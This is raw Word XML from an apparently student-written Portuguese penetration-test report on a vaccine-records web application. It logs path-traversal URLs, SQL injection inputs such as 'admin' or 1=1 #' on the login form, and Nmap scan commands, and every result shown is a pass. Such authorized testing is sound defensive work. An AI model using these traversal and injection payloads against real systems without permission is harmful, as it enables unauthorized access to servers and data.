        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708" w:firstLine="708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>: Passou no teste.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Tentativa 3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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>vacina/login.php?logado=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e%2f%2e%2e%2f (código equivalente a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>../../)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o Sistema de Vacinas. Foi esperado que o sistema realizasse algum bloqueio para impedir o acesso.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84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5"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2844" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O comando  “../../” servem para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor que hospeda o Sistema de Vacinas.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>: Passou no teste.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Tentativa 4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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">vacina/login.php?logado=../data.js </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">para acessar o arquivo “data.js”, </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o Sistema de Vacinas. Foi esperado que o sistema realizasse algum bloqueio para impedir o acesso.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1E119E" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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O comando  “../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema </w:t>
      </w:r>
      <w:r w:rsidRPr="001E119E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>operacional do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001E119E" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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r w:rsidRPr="001E119E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>“data.js” foi um arquivo descoberto através do escaneamento realizado através do Burp Suite Intercept para mapear a estrutura de pastas da aplicação.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844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>: Passou no teste.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Tentativa 5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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">vacina/login.php?logado=./././ </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o Sistema de Vacinas. Foi esperado que o sistema realizasse algum bloqueio para impedir o acesso.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7"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="283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O comando  “./.././”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.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>: Passou no teste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Tentativa 6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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">vacina/login.php?login=teste&amp;senha=./././, </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o Sistema de Vacinas. </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Foi esperado que o sistema realizasse algum bloqueio para impedir o acesso.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12"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2832" w:firstLine="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC374A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O comando  “./.././”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FC374A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>: Passou no teste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Tentativa 7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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>vacina/login.php?login=teste&amp;senha</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=.. , </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o Sistema de Vacinas. Foi esperado que o sistema realizasse algum bloqueio para impedir o acesso.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1E119E" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:num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 w:rsidRPr="001E119E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O comando  “./.././”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.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>: Passou no teste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Pr="005D3B2A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  <w:r w:rsidRPr="005D3B2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3B2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tela Login - Mapeamento da hierarquia de pastas do sistema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dia 30/03/16.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Duração: 1 hora e 30 minutos.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Objetivo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Utilizar de forma automatizada o módulo Burp Spider da ferramenta Burp Suite para </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>realizar um reconhecimento da a hierarquia de diretórios do sistema armazenados dentro do servidor a partir da URL da tela de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Login: IP_do_servidor/vacina/login.php. A partir dos resultados, verificar se foi possível ter acesso à hierarquia de pastas do sistema mesmo sem efetuar a requisição do login. Além disso, verificar se é possível ter acesso aos códigos da aplicação.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Resultados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Tentativa 1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Acessar a página do Login utilizando a url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0E26E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r w:rsidRPr="000E26E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">_do_servidor/vacina/login.php.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Esperava-se que o sistema não permitisse a visualização da hierarquia de pastas do sistema.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>: Passou no teste. Conforme mostra figura 3, não foi possível mapear a estrutura de pastas do sistema apenas acessando a página de Login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00654DEF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654DEF" w:rsidRDefault="00654DEF" w:rsidP="00654DEF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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4681855"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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2719E7" w:rsidRDefault="008C6DC7" w:rsidP="00654DEF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figura 3 - Resultado tentativa de mapeamento diretórios do sistema</w:t>
      </w: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jc w:val="both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jc w:val="both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Pr="00572A0D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  <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00572A0D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tela Login - Exploração </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00572A0D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ia SQL Injection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dia 07/04/16.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Duração: 1 hora e 40 minutos.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Objetivo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página de Login na tentativa de forçar ações não autorizadas no sistema.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Resultados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Tentativa 1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Verificar se o campo Login é vulnerável a injeção de código SQL fazendo uso da técnica de concatenação de aspas simples.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Foi esperado que o sistema realizasse o tratamento do caractere aspa simples como um parâmetro regular da consulta.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985A8F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i/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Entrada: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>admin’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>: Passou no teste. A aplicação realizou o tratamento de dados de entrada e não permitiu</w:t>
      </w:r>
      <w:r w:rsidRPr="00985A8F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> a injeção de instruções SQL através do campo de Login.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Tentativa 2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Inserir um texto com uma distribuição adequada de aspa simples e comentários inline [8,9 e 10] como entrada no campo Login, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao login de usuários cadastrados. Comentários inline foram utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.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Pr="00654DEF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654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Entradas: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00736DBC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i/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736DBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ or 1=1 #   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00736DBC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/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736DBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ or 1=1  --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i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Passou no teste. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.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Tentativa 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594AD8" w:rsidRDefault="00594AD8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Inserir um texto fazendo uso de uma única aspa simples para completar a entrada de uma possível instrução SQL executada no momento do login no sistema.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Entradas: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admin’ or ‘a’=’a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00751591">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0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lastRenderedPageBreak/>
        <w:t>Foi esperado que o sistema realizasse o tratamento de todos os  caracteres informados como parâmetros regulares da consulta.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Resultado: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4218C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A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="pt"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="pt"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="pt"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A63EAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="Pargrafoda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993" w:hanging="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63EAA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Iteração 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A63EAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="993"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A63EAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="285" w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63EAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1 Análise do Servidor - Exploração via Nmap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no dia 09/04/16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Duração: 1 hora.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Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001702C9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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizar a ferramenta Nmap para descobrir quais portas estavam abertas no servidor e que </w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>atividade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00892814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>maliciosa</w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>pode ser desenvolvida a partir disso.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Resultados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Tentativa 1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>Utilização do comando nmap -Ss -O IP_do_servidor.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15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“-Ss” permite que a ferramenta tente fazer o scan SYN do TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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“-O” permite que a ferramenta tente encontrar o sistema operacional rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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IP_do_servidor informa o IP onde está hospedada a aplicação em teste.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7D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, os serviços que essas portas rodavam no momento do escaneamento.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Resultado:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Erro na ferramenta.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Tentativa 2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 Utilização do comando nmap -sS -O IP_do_servidor.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16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“-sS” permite que a ferramenta tente fazer o scan SYN do TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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“-O” permite que a ferramenta tente encontrar o sistema operacional rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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IP_do_servidor informa o IP onde está hospedada a aplicação em teste.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7D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, os serviços que essas portas rodavam no momento do escaneamento.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Resultado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E01CAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Conforme a Figura 4, a ferramenta conseguiu escanear todas as portas abertas e exibir os serviços que estavam rodando nessas portas.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654DEF" w:rsidRDefault="00654DEF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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="381825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Default="008C6DC7" w:rsidP="00C624EB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Figura 4 - Portas encontradas e os serviços que estavam rodando nelas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRDefault="00751591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Tentativa 3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>Utilização do comando:  nmap -sV  -O IP_do_servidor.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17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“-sV” permite que a ferramenta realize o SYN e busque a versão do software  rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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“-O” permite que a ferramenta tente encontrar o sistema operacional rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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IP_do_servidor informa o IP onde está hospedada a aplicação em teste.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844"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E01CAE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2112"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
